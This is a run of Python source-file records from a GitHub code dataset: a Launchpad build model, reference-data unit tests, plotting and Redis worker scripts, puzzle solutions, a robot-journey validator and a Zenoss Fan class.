find_spec + (order_by_table,)\n result_set = IStore(BinaryPackageBuild).using(*clauseTables).find(\n find_spec, *condition_clauses)\n result_set.order_by(*order_by)\n\n return self._decorate_with_prejoins(\n DecoratedResultSet(result_set, result_decorator=itemgetter(0)))\n\n def _decorate_with_prejoins(self, result_set):\n \"\"\"Decorate build records with related data prefetch functionality.\"\"\"\n # Grab the native storm result set.\n result_set = IResultSet(result_set)\n decorated_results = DecoratedResultSet(\n result_set, pre_iter_hook=self._prefetchBuildData)\n return decorated_results\n\n def getBuildsBySourcePackageRelease(self, sourcepackagerelease_ids,\n buildstate=None):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n if (sourcepackagerelease_ids is None or\n len(sourcepackagerelease_ids) == 0):\n return []\n query = [\n BinaryPackageBuild.source_package_release_id.is_in(\n sourcepackagerelease_ids),\n BinaryPackageBuild.is_distro_archive,\n ]\n\n if buildstate is not None:\n query.append(BinaryPackageBuild.status == buildstate)\n\n resultset = IStore(BinaryPackageBuild).find(BinaryPackageBuild, *query)\n resultset.order_by(\n Desc(BinaryPackageBuild.date_created), BinaryPackageBuild.id)\n return resultset\n\n def getStatusSummaryForBuilds(self, builds):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n # Create a small helper function to collect the builds for a given\n # list of build states:\n def collect_builds(*states):\n wanted = []\n for state in states:\n candidates = [build for build in builds\n if build.status == state]\n wanted.extend(candidates)\n return wanted\n\n failed = collect_builds(BuildStatus.FAILEDTOBUILD,\n BuildStatus.MANUALDEPWAIT,\n BuildStatus.CHROOTWAIT,\n BuildStatus.FAILEDTOUPLOAD)\n needsbuild = collect_builds(BuildStatus.NEEDSBUILD)\n building = collect_builds(BuildStatus.BUILDING,\n BuildStatus.UPLOADING)\n successful = collect_builds(BuildStatus.FULLYBUILT)\n\n # Note: the BuildStatus DBItems are used here to summarize the\n # status of a set 
of builds:\n if len(building) != 0:\n return {\n 'status': BuildSetStatus.BUILDING,\n 'builds': building,\n }\n elif len(needsbuild) != 0:\n return {\n 'status': BuildSetStatus.NEEDSBUILD,\n 'builds': needsbuild,\n }\n elif len(failed) != 0:\n return {\n 'status': BuildSetStatus.FAILEDTOBUILD,\n 'builds': failed,\n }\n else:\n return {\n 'status': BuildSetStatus.FULLYBUILT,\n 'builds': successful,\n }\n\n def _prefetchBuildData(self, results):\n \"\"\"Used to pre-populate the cache with build related data.\n\n When dealing with a group of Build records we can't use the\n prejoin facility to also fetch BuildQueue, SourcePackageRelease\n and LibraryFileAlias records in a single query because the\n result set is too large and the queries time out too often.\n\n So this method receives a list of Build instances and fetches the\n corresponding SourcePackageRelease and LibraryFileAlias rows\n (prejoined with the appropriate SourcePackageName and\n LibraryFileContent respectively) as well as builders related to the\n Builds at hand.\n \"\"\"\n from lp.registry.model.sourcepackagename import (\n SourcePackageName)\n from lp.soyuz.model.sourcepackagerelease import (\n SourcePackageRelease)\n\n # Prefetching is not needed if the original result set is empty.\n if len(results) == 0:\n return\n\n build_ids = [build.id for build in results]\n origin = (\n BinaryPackageBuild,\n Join(\n SourcePackageRelease,\n (SourcePackageRelease.id ==\n BinaryPackageBuild.source_package_release_id)),\n Join(\n SourcePackageName,\n SourcePackageName.id\n == SourcePackageRelease.sourcepackagenameID),\n LeftJoin(LibraryFileAlias,\n LibraryFileAlias.id == BinaryPackageBuild.log_id),\n LeftJoin(LibraryFileContent,\n LibraryFileContent.id == LibraryFileAlias.contentID),\n LeftJoin(Builder, Builder.id == BinaryPackageBuild.builder_id),\n )\n result_set = IStore(BinaryPackageBuild).using(*origin).find(\n (SourcePackageRelease, LibraryFileAlias, SourcePackageName,\n LibraryFileContent, Builder),\n BinaryPackageBuild.id.is_in(build_ids))\n\n # Force query execution so that the ancillary data gets fetched\n # and added to StupidCache.\n # We are doing this here because there is no \"real\" caller of\n # this (pre_iter_hook()) method that will iterate over the\n # result set and force the query execution that way.\n return list(result_set)\n\n def getByQueueEntry(self, queue_entry):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n return IStore(BinaryPackageBuild).find(\n BinaryPackageBuild,\n BuildPackageJob.build == BinaryPackageBuild.id,\n BuildPackageJob.job == BuildQueue.jobID,\n BuildQueue.job == queue_entry.job).one()\n\n def getQueueEntriesForBuildIDs(self, build_ids):\n \"\"\"See `IBinaryPackageBuildSet`.\"\"\"\n origin = (\n BuildPackageJob,\n Join(BuildQueue, BuildPackageJob.job == BuildQueue.jobID),\n Join(\n BinaryPackageBuild,\n BuildPackageJob.build == BinaryPackageBuild.id),\n LeftJoin(\n Builder,\n BuildQueue.builderID == Builder.id),\n )\n return IStore(BinaryPackageBuild).using(*origin).find(\n (BuildQueue, Builder, BuildPackageJob),\n BinaryPackageBuild.id.is_in(build_ids))\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/soyuz/model/binarypackagebuild.py","file_name":"binarypackagebuild.py","file_ext":"py","file_size_in_byte":48505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"34742158589","text":"from __future__ import division\nfrom core.common.utilities.include import *\n\nimport unittest\n\nfrom 
common.utilities.inversion_of_control import dependencies, Dependency\nfrom common.helpers.common_dependency_helper import register_common_mock_dependencies\n\nfrom core.common.utilities.errors import *\nfrom core.common.utilities.helpers import *\nfrom core.common.business_logic.reference_data import BusinessReferenceData\n\n__author__ = 'vahram'\n\n###################################################################################################\n\nclass BusinessEntityTests(unittest.TestCase):\n\n def setUp(self):\n\n register_common_mock_dependencies()\n\n def tearDown(self):\n\n dependencies.clear()\n\n ##------------------------------------ Private Methods --------------------------------------##\n\n def __refdata_standard_init(self):\n\n self.time_init_refdata = get_current_timestamp()\n\n self.entity_type_map = \\\n {\n \"e1\":\n {\n \"requirements\":\n {\n \"data.s\": \"string\",\n \"data.i\": \"integer\",\n \"data.f\": \"float\",\n \"data.n\": \"number\",\n \"data.b\": \"boolean\",\n \"data.x\": [1, 2, 3, \"xyz\"],\n }\n },\n \"e2\": {}\n }\n\n self.relation_type_map =\\\n {\n \"rel1\":\n [\n {\n \"from\":\n {\n \"entity_type\": \"e1\",\n \"entity_role\": \"role1\",\n \"requirements\": {\"data.x\": [1, 2, 3]}\n },\n \"to\":\n {\n \"entity_type\": \"e2\",\n \"entity_role\": \"role2\",\n \"requirements\": {\"data.x\": [\"xyz\"]}\n },\n \"properties\":\n {\n \"ownership\": False\n }\n },\n {\n \"from\":\n {\n \"entity_type\": \"e1\",\n \"entity_role\": \"role1_other\",\n \"requirements\": {\"data.z\": \"boolean\"}\n },\n \"to\":\n {\n \"entity_type\": \"e2\",\n \"entity_role\": \"role2_other\",\n \"requirements\": {\"data.z\": \"string\"}\n },\n \"properties\":\n {\n \"ownership\": False\n }\n }\n ]\n }\n\n return BusinessReferenceData.standard_init(\n self.entity_type_map,\n self.relation_type_map,\n time_creation = self.time_init_refdata\n )\n\n def __refdata_dict_init(self):\n\n path = os.path.join(os.path.dirname(__file__), \"data\")\n filename = \"test_reference_data.json\"\n with open(os.path.join(path, filename)) as fin:\n\n ref_data_rec = json.load(fin)\n result = BusinessReferenceData.dict_init(ref_data_rec)\n\n return result\n\n ##---------------------------------- Test Initialization ------------------------------------##\n\n def test_standard_init_success(self):\n\n refdata = self.__refdata_standard_init()\n\n self.assertIsInstance(refdata, BusinessReferenceData)\n self.assertIsInstance(refdata.meta, dict)\n\n self.assertEqual(refdata.meta[\"updated_at\"], self.time_init_refdata)\n self.assertEqual(refdata.meta[\"created_at\"], self.time_init_refdata)\n\n self.assertIsInstance(refdata.entity_type_map, dict)\n self.assertIsInstance(refdata.relation_type_map, dict)\n\n self.assertEqual(len(refdata.entity_type_map), 2)\n self.assertEqual(len(refdata.relation_type_map), 1)\n\n self.assertTrue(refdata.validate())\n\n def test_dict_init_success(self):\n\n refdata = self.__refdata_dict_init()\n\n self.assertIsInstance(refdata, BusinessReferenceData)\n self.assertIsInstance(refdata.meta, dict)\n\n self.assertLessEqual(refdata.meta[\"created_at\"], refdata.meta[\"updated_at\"])\n\n self.assertIsInstance(refdata.entity_type_map, dict)\n self.assertIsInstance(refdata.relation_type_map, dict)\n\n self.assertEqual(len(refdata.entity_type_map), 12)\n self.assertEqual(len(refdata.relation_type_map), 17)\n\n self.assertTrue(refdata.validate())\n\n ##---------------------------------- Test Entity Types - Getters ----------------------------##\n\n def test_entity_type_getters(self):\n\n 
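# Editor's note: the assertions below exercise validators built from the\n # \"requirements\" map in __refdata_standard_init: type names (\"string\",\n # \"integer\", \"float\", \"number\", \"boolean\") become type checks, and the\n # value list under \"data.x\" becomes a membership test.\n 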
refdata = self.__refdata_standard_init()\n\n self.assertTrue(refdata.is_valid_entity_type(\"e1\"))\n self.assertTrue(refdata.is_valid_entity_type(\"e2\"))\n self.assertFalse(refdata.is_valid_entity_type(\"e3\"))\n\n self.assertEqual(set(refdata.get_all_entity_types()), {\"e1\", \"e2\"})\n self.assertNotEqual(refdata.get_entity_type_info(\"e1\"), {})\n self.assertEqual(refdata.get_entity_type_info(\"e2\"), {})\n\n validators = refdata.get_entity_type_validators(\"e1\")\n self.assertEqual(set(validators.keys()),\n {\"data.s\", \"data.i\", \"data.f\", \"data.n\", \"data.b\", \"data.x\"})\n self.assertTrue( validators[\"data.s\"](\"x\"))\n self.assertFalse(validators[\"data.s\"](1))\n self.assertTrue( validators[\"data.i\"](1))\n self.assertFalse(validators[\"data.i\"](\"x\"))\n self.assertTrue( validators[\"data.f\"](1.0))\n self.assertFalse(validators[\"data.f\"](1))\n self.assertTrue( validators[\"data.n\"](1.0))\n self.assertTrue( validators[\"data.n\"](1))\n self.assertFalse(validators[\"data.n\"](\"x\"))\n self.assertTrue( validators[\"data.b\"](False))\n self.assertFalse(validators[\"data.b\"](1))\n self.assertTrue( validators[\"data.x\"](1))\n self.assertTrue( validators[\"data.x\"](2))\n self.assertTrue( validators[\"data.x\"](3))\n self.assertTrue( validators[\"data.x\"](\"xyz\"))\n self.assertFalse(validators[\"data.x\"](\"xy\"))\n\n ##---------------------------------- Test Entity Types - Setters ----------------------------##\n\n def test_entity_type_setters(self):\n\n refdata = self.__refdata_standard_init()\n\n context_data = {\n \"source\": \"test_reference_data.py\",\n \"user_id\": None\n }\n refdata.register_context(context_data)\n\n self.assertRaises(InputError, lambda s: refdata.add_entity_type(s), \"e2\")\n self.assertFalse(refdata.is_valid_entity_type(\"e3\"))\n refdata.add_entity_type(\"e3\")\n self.assertTrue(refdata.is_valid_entity_type(\"e3\"))\n refdata.del_entity_type(\"e3\")\n self.assertRaises(InputError, lambda s: refdata.del_entity_type(s), \"e3\")\n\n self.assertNotIn(\"data.y\", refdata.get_entity_type_validators(\"e1\"))\n refdata.add_entity_type_required_field(\"e1\", \"data.y\", field_values = [\"Y\"])\n self.assertIn(\"data.y\", refdata.get_entity_type_validators(\"e1\"))\n self.assertTrue(refdata.get_entity_type_validators(\"e1\")[\"data.y\"](\"Y\"))\n self.assertFalse(refdata.get_entity_type_validators(\"e1\")[\"data.y\"](\"X\"))\n refdata.del_entity_type_required_field(\"e1\", \"data.y\")\n self.assertNotIn(\"data.y\", refdata.get_entity_type_validators(\"e1\"))\n\n #pprint.pprint(refdata.meta)\n\n ##---------------------------------- Test Relation Types - Getters ----------------------------##\n\n def test_relation_type_getters(self):\n\n refdata = self.__refdata_standard_init()\n\n self.assertTrue(refdata.is_valid_relation_type(\"rel1\"))\n self.assertFalse(refdata.is_valid_relation_type(\"rel2\"))\n\n self.assertEqual(refdata.get_all_relation_types(), [\"rel1\"])\n self.assertEqual(refdata.get_all_relation_types_for(\"e1\", \"e2\"), [\"rel1\"])\n self.assertEqual(refdata.get_all_relation_types_for(\"e2\", \"e1\"), [\"rel1\"])\n self.assertEqual(refdata.get_all_relation_types_for(\"e1\", \"e1\"), [])\n self.assertEqual(len(refdata.get_relation_type_info(\"rel1\")), 2)\n\n recs_all = refdata.get_relation_records(\"e1\", \"e2\")\n def f_remove_relation_type(rec):\n self.assertIn(\"relation_type\", rec)\n self.assertEqual(rec[\"relation_type\"], \"rel1\")\n del rec[\"relation_type\"]\n map(f_remove_relation_type, recs_all)\n\n 
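# Editor's note: this relies on Python 2's eager map(); under Python 3,\n # map() is lazy, so f_remove_relation_type would never run and the\n # equality check against self.relation_type_map[\"rel1\"] below would fail.\n 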
self.assertEqual(len(recs_all), 2)\n self.assertEqual(recs_all, self.relation_type_map[\"rel1\"])\n\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e3\")), 0)\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e2\", relation_types = [\"x\"])), 0)\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e2\", entity_role_from = \"x\")), 0)\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e2\", entity_role_to = \"x\")), 0)\n\n recs_1 = refdata.get_relation_records(\"e1\", \"e2\", entity_role_from = \"role1\")\n map(f_remove_relation_type, recs_1)\n\n self.assertEqual(len(recs_1), 1)\n self.assertEqual(recs_1[0], self.relation_type_map[\"rel1\"][0])\n\n recs_2 = refdata.get_relation_records(\"e1\", \"e2\", entity_role_to = \"role2_other\")\n map(f_remove_relation_type, recs_2)\n\n self.assertEqual(len(recs_2), 1)\n self.assertEqual(recs_2[0], self.relation_type_map[\"rel1\"][1])\n\n def test_real_refdata_relation_type_getters(self):\n\n refdata = self.__refdata_dict_init()\n\n recs = refdata.get_relation_records(\"file\", \"retail_input_record\")\n #print \"\\n\\n\".join(pprint.pformat(rec) for rec in recs)\n\n recs = refdata.get_relation_records(\"retail_input_record\", \"file\")\n #print \"\\n\\n\".join(pprint.pformat(rec) for rec in recs)\n\n\n def test_relation_records_validation(self):\n\n refdata = self.__refdata_dict_init()\n\n data1 =\\\n {\n \"type\": \"retail_parent\",\n \"test1\": \"random stuff\"\n }\n data2 =\\\n {\n \"type\": \"retail_banner\",\n \"test2\": \"random stuff\"\n }\n data3 =\\\n {\n \"type\": \"retail_concept\",\n }\n data4 =\\\n {\n \"name\": \"Banana Republic\",\n }\n\n rel_recs = refdata.get_relation_records(\"company\",\n \"company\",\n \"retailer_branding\",\n \"retail_parent\",\n \"retail_segment\")\n self.assertEqual(len(rel_recs), 2)\n\n validators = refdata.get_relation_record_validators(rel_recs[0])\n self.assertEqual(set(validators.keys()), {\"from\", \"to\"})\n\n self.assertTrue(refdata.validate_relation_data(data1, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data1, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data4, validators))\n\n validators = refdata.get_relation_record_validators(rel_recs[1])\n self.assertEqual(set(validators.keys()), {\"from\", \"to\"})\n\n self.assertTrue(refdata.validate_relation_data(data2, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data4, validators))\n\n rel_recs = refdata.get_relation_records(\"company\",\n \"company\",\n \"retailer_branding\",\n \"retail_segment\",\n \"retail_parent\")\n self.assertEqual(len(rel_recs), 2)\n\n validators = refdata.get_relation_record_validators(rel_recs[0])\n self.assertEqual(set(validators.keys()), {\"from\", \"to\"})\n\n self.assertTrue(refdata.validate_relation_data(data2, 
data1, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data4, validators))\n\n validators = refdata.get_relation_record_validators(rel_recs[1])\n self.assertEqual(set(validators.keys()), {\"from\", \"to\"})\n\n self.assertTrue(refdata.validate_relation_data(data3, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data4, validators))\n\n ##---------------------------------- Test Relation Types - Setters ----------------------------##\n\n def test_relation_type_setters(self):\n\n refdata = self.__refdata_standard_init()\n context_data = {\n \"source\": \"test_reference_data.py\",\n \"user_id\": None\n }\n refdata.register_context(context_data)\n\n self.assertRaises(InputError, lambda s: refdata.add_relation_type(s), \"rel1\")\n self.assertFalse(refdata.is_valid_relation_type(\"rel2\"))\n refdata.add_relation_type(\"rel2\")\n self.assertTrue(refdata.is_valid_relation_type(\"rel2\"))\n self.assertEqual(refdata.get_relation_records(\"e1\", \"e2\", relation_types = [\"rel2\"]), [])\n refdata.del_relation_type(\"rel2\")\n self.assertRaises(InputError, lambda s: refdata.del_relation_type(s), \"rel2\")\n\n refdata.add_relation_type(\"rel2\")\n refdata.add_relation_record(\"rel2\", \"e1\", \"role A\", {}, \"e2\", \"role B\", {})\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e2\")), 3)\n refdata.add_relation_record(\"rel2\", \"e2\", \"role C\", {}, \"e3\", \"role D\", {\"data.t\":\"T\"})\n self.assertEqual(len(refdata.get_relation_records(\"e2\", \"e3\")), 1)\n refdata.del_relation_record(\"rel2\", \"e2\", \"role C\", {}, \"e3\", \"role D\", {\"data.t\":\"T\"})\n self.assertEqual(len(refdata.get_relation_records(\"e2\", \"e3\")), 0)\n\n ##-------------------------------------------------------------------------------------------##\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"erezrubinstein/aa","sub_path":"tests/unit_tests/core_tests/business_logic_tests/test_reference_data.py","file_name":"test_reference_data.py","file_ext":"py","file_size_in_byte":15364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17761313072","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nplt.rcParams[\"figure.figsize\"] = [7.50, 3.50]\nplt.rcParams[\"figure.autolayout\"] = True\nfilepath = \"/Users/Charlie/Library/Mobile Documents/com~apple~CloudDocs/Knowledge_Engineering/train.csv2022-06-04 01:37:39 acc_evo.csv\"\ndf1 = pd.read_csv(filepath)\ndf1.set_index('epoch').plot()\nplt.title('Accuracy Evolution')\nplt.show()","repo_name":"Aequatio-Space/ASAP-ACSA","sub_path":"4 - plot.py","file_name":"4 - 
plot.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43939793075","text":"# 递归案例——计算数字累加\n\"\"\"\n定义一个函数sum_numbers\n能够接收一个num的整数参数\n计算1+2+3+...+num的结果\n\"\"\"\n\n\ndef sun_numbers(num):\n if num == 1:\n return 1\n # 假设sum_numbers 能够完成 num - 1 的累加\n temp = sun_numbers(num - 1)\n\n # 函数内部的核心算法就是两个数字的相加\n return num + temp\n\n\nprint(sun_numbers(3))\n","repo_name":"showyouhappiness/Python_study","sub_path":"递归/递归-相加.py","file_name":"递归-相加.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2887111338","text":"import jobs\nfrom hotqueue import HotQueue\nimport redis\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport json\n\nq = HotQueue(\"queue\", host=sys.argv[1], port=6379, db=1)\nrd = redis.StrictRedis(host=sys.argv[1], port=6379, db=0)\njd = redis.StrictRedis(host=sys.argv[1], port=6379, db=2)\n\n@q.worker\ndef execute_job(jid):\n \n jobs.update_job_status(jid, 'in progress')\n\n jobid = jobs.generate_job_key(jid).encode()\n\n job_info = jd.hgetall(jobid)\n \n data = json.loads(rd.get('vehicle_emissions'))\n plt.figure()\n if job_info['plot_type'.encode()].decode() == \"bar\":\n field_1 = job_info['field_1'.encode()].decode()\n field_2 = job_info['field_2'.encode()].decode()\n x_axis = []\n y_axis = []\n total = 0\n iters = 0\n for row in data['vehicle_emissions']:\n if row[field_1] not in x_axis:\n x_axis.append(row[field_1])\n\n for row in x_axis:\n for wor in data['vehicle_emissions']:\n if row == wor[field_1]:\n iters += 1\n total += float(wor[field_2])\n\n average = total/iters\n y_axis.append(average)\n iters = 0\n total = 0\n\n plt.bar(x_axis, y_axis, width = 0.3)\n plt.xticks(rotation=90)\n plt.title('{} vs {}'.format(field_1, field_2))\n plt.xlabel(field_1)\n plt.ylabel(field_2)\n plt.tight_layout()\n plt.savefig('bar_plot.png')\n \n with open('bar_plot.png', 'rb') as f:\n img = f.read()\n\n jd.hset(jobid, 'image', img)\n jd.hset(jobid, 'status', 'finished')\n\n elif job_info['plot_type'.encode()].decode() == \"scatter\":\n\n field_1 = job_info['field_1'.encode()].decode()\n field_2 = job_info['field_2'.encode()].decode()\n x_axis = []\n y_axis = []\n\n for row in data['vehicle_emissions']:\n x_axis.append(float(row[field_1]))\n\n for row in data['vehicle_emissions']:\n y_axis.append(float(row[field_2]))\n\n plt.scatter(x_axis, y_axis, c = \"red\", s=2)\n\n plt.title('{} vs {}'.format(field_1, field_2))\n plt.xlabel(field_1)\n plt.ylabel(field_2)\n plt.savefig('scatter_plot.png')\n\n with open('scatter_plot.png', 'rb') as f:\n img = f.read()\n\n jd.hset(jobid, 'image', img)\n jd.hset(jobid, 'status', 'finished')\n\n else:\n jd.hset(jobid, 'status', 'cancelled (invalid job type)')\n\nexecute_job()\n","repo_name":"geovbra/vehicle-emissions-data-analyzer","sub_path":"src/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23572049321","text":"t = int(input())\r\nfor a0 in range(t):\r\n n, k = map(int, input().strip().split(' '))\r\n\r\n N = 1\r\n NN = 1\r\n while N <= n:\r\n NN += 1\r\n N = 2**NN - 1\r\n NN -= 1\r\n N = 2**NN-1\r\n a = n-N\r\n\r\n M = 1\r\n while M <= k:\r\n M *= 2\r\n M //= 2\r\n b = k - M\r\n\r\n result = ((N+1)//M - 2) + (a+M-1-b)//M\r\n\r\n if result % 2 == 0:\r\n print(\"Case #\" + str(a0 + 1) + \": 
\" + str(result//2) + \" \" + str(result//2))\r\n else:\r\n print(\"Case #\" + str(a0 + 1) + \": \" + str((result+1)//2) + \" \" + str((result-1)//2))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/326.py","file_name":"326.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6832211605","text":"a = {\n \"name\": \"yerassyl\",\n \"age\": 16,\n \"salary\": 2000,\n \"experience\": 2,\n}\nb = {\n \"name\": \"kirito\",\n \"age\": 18,\n \"salary\": 3000,\n \"experience\": 3,\n}\nc = {\n \"name\": \"lasdlsd\",\n \"age\": 22,\n \"salary\": 400,\n \"experience\": 4,\n}\npeoples = [a, b, c]\nfor person in peoples:\n print(person[\"name\"], person[\"salary\"], person[\"age\"])\nsumi = 0\nn = len(peoples)\nfor person in peoples:\n sumi = sumi + person[\"salary\"]\nprint(sumi / n)\n","repo_name":"kirigaikabuto/Python19Lessons","sub_path":"lesson16/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3896934655","text":"import argparse\nfrom enum import Enum, auto\nfrom dataclasses import dataclass\nfrom typing import List, Tuple\nfrom functools import reduce\n\n\nclass Direction(Enum):\n North = auto()\n East = auto()\n South = auto()\n West = auto()\n\n\nclass Command(Enum):\n Left = auto()\n Right = auto()\n Forward = auto()\n\n\n@dataclass()\nclass Position:\n x: int\n y: int\n\n def as_tuple(self):\n return self.x, self.y\n\n\n@dataclass()\nclass Robot:\n position: Position\n direction: Direction\n\n\n@dataclass()\nclass Journey:\n start: Robot\n end: Robot\n commands: List[Command]\n\n\ndirection_map = {\n \"N\": Direction.North,\n \"E\": Direction.East,\n \"S\": Direction.South,\n \"W\": Direction.West,\n}\n\n\ncommand_map = {\n \"L\": Command.Left,\n \"R\": Command.Right,\n \"F\": Command.Forward,\n}\n\n\ndef parse_robot(line: str) -> Robot:\n parts = line.split()\n x = int(parts[0])\n y = int(parts[1])\n direction = direction_map[parts[2]]\n\n return Robot(position=Position(x=x, y=y), direction=direction)\n\n\ndef handle_command(robot: Robot, command: Command):\n # possibly treating auto enums as ints is a bit too magic, depending on taste a more explicit mapping might be preferred\n if command == Command.Left:\n val = robot.direction.value - 1\n new_direction = (\n Direction.West if val < Direction.North.value else Direction(val)\n )\n new_position = robot.position\n\n elif command == Command.Right:\n val = robot.direction.value + 1\n new_direction = (\n Direction.North if val > Direction.West.value else Direction(val)\n )\n new_position = robot.position\n\n else: # command == Command.Forward:\n new_direction = robot.direction\n x = robot.position.x\n y = robot.position.y\n if robot.direction == Direction.North:\n new_position = Position(x=x, y=y + 1)\n elif robot.direction == Direction.East:\n new_position = Position(x=x + 1, y=y)\n elif robot.direction == Direction.South:\n new_position = Position(x=x, y=y - 1)\n else: # robot.direction == Direction.West:\n new_position = Position(x=x - 1, y=y)\n\n return Robot(new_position, new_direction)\n\n\ndef is_journey_valid(lines: List[str]) -> Tuple[bool, Robot]:\n start = parse_robot(lines[0])\n commands = [command_map[c] for c in lines[1]]\n proposed_end = parse_robot(lines[2])\n\n # possibly reduce() is unpythonic, depending on taste a standard for loop might be preferred\n 
actual_end = reduce(handle_command, commands, start)\n\n return (\n proposed_end.direction == actual_end.direction\n and proposed_end.position.as_tuple() == actual_end.position.as_tuple()\n ), actual_end\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Process robot journeys.\")\n parser.add_argument(\"file_path\", help=\"path to input file\")\n\n args = parser.parse_args()\n\n with open(args.file_path, \"r\") as f:\n result = is_journey_valid(f.readlines())\n print(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jamesjrg/python-playground","sub_path":"robot-journeys/journeys.py","file_name":"journeys.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23564721761","text":"def solve(N):\n if not N:\n return ''\n lb = '9' * len(N)\n while int(lb) > int(N) and lb[0] > '1':\n lb = chr(ord(lb[0]) - 1) * len(N)\n if int(lb) > int(N):\n return solve('9' * (len(N) - 1))\n if lb[0] < N[0]:\n return lb[0] + '9' * (len(N) - 1)\n return lb[0] + solve(N[1:])\n\nfor t in range(1, int(input())+1):\n N = input()\n print(\"Case #{}: {}\".format(t, solve(N)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/561.py","file_name":"561.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17613785403","text":"__doc__=\"\"\"Fan\n\nFan is an abstraction of any fan on a device. CPU, chassis, etc.\n\n$Id: Fan.py,v 1.7 2004/04/06 22:33:24 edahl Exp $\"\"\"\n\n__version__ = \"$Revision: 1.7 $\"[11:-2]\n\nfrom AccessControl.class_init import InitializeClass\nfrom math import isnan\nfrom Products.ZenRelations.RelSchema import *\n\nfrom HWComponent import HWComponent\n\nfrom Products.ZenModel.ZenossSecurity import *\n\nclass Fan(HWComponent):\n \"\"\"Fan object\"\"\"\n\n portal_type = meta_type = 'Fan'\n\n state = \"unknown\"\n type = \"unknown\"\n\n _properties = HWComponent._properties + (\n {'id':'state', 'type':'string', 'mode':'w'},\n {'id':'type', 'type':'string', 'mode':'w'},\n )\n\n _relations = HWComponent._relations + (\n (\"hw\", ToOne(ToManyCont, \"Products.ZenModel.DeviceHW\", \"fans\")),\n )\n\n \n factory_type_information = ( \n { \n 'id' : 'Fan',\n 'meta_type' : 'Fan',\n 'description' : \"\"\"Arbitrary device grouping class\"\"\",\n 'icon' : 'Fan_icon.gif',\n 'product' : 'ZenModel',\n 'factory' : 'manage_addFan',\n 'immediate_view' : 'viewFan',\n 'actions' :\n ( \n { 'id' : 'status'\n , 'name' : 'Status'\n , 'action' : 'viewFan'\n , 'permissions' : ('View',)\n },\n { 'id' : 'perfConf'\n , 'name' : 'Template'\n , 'action' : 'objTemplates'\n , 'permissions' : (\"Change Device\", )\n },\n )\n },\n )\n\n\n def rpmString(self):\n \"\"\"\n Return a string representation of the RPM\n \"\"\"\n rpm = self.rpm()\n return rpm is None and \"unknown\" or \"%lrpm\" % (rpm,)\n\n\n def rpm(self, default=None):\n \"\"\"\n Return the current RPM\n \"\"\"\n rpm = self.cacheRRDValue('rpm', default)\n if rpm is not None and not isnan(rpm):\n return long(rpm)\n return None\n\n\n def viewName(self):\n return self.id\n name = viewName\n\n\nInitializeClass(Fan)\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/Fan.py","file_name":"Fan.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"3721942016","text":"from market_data import 
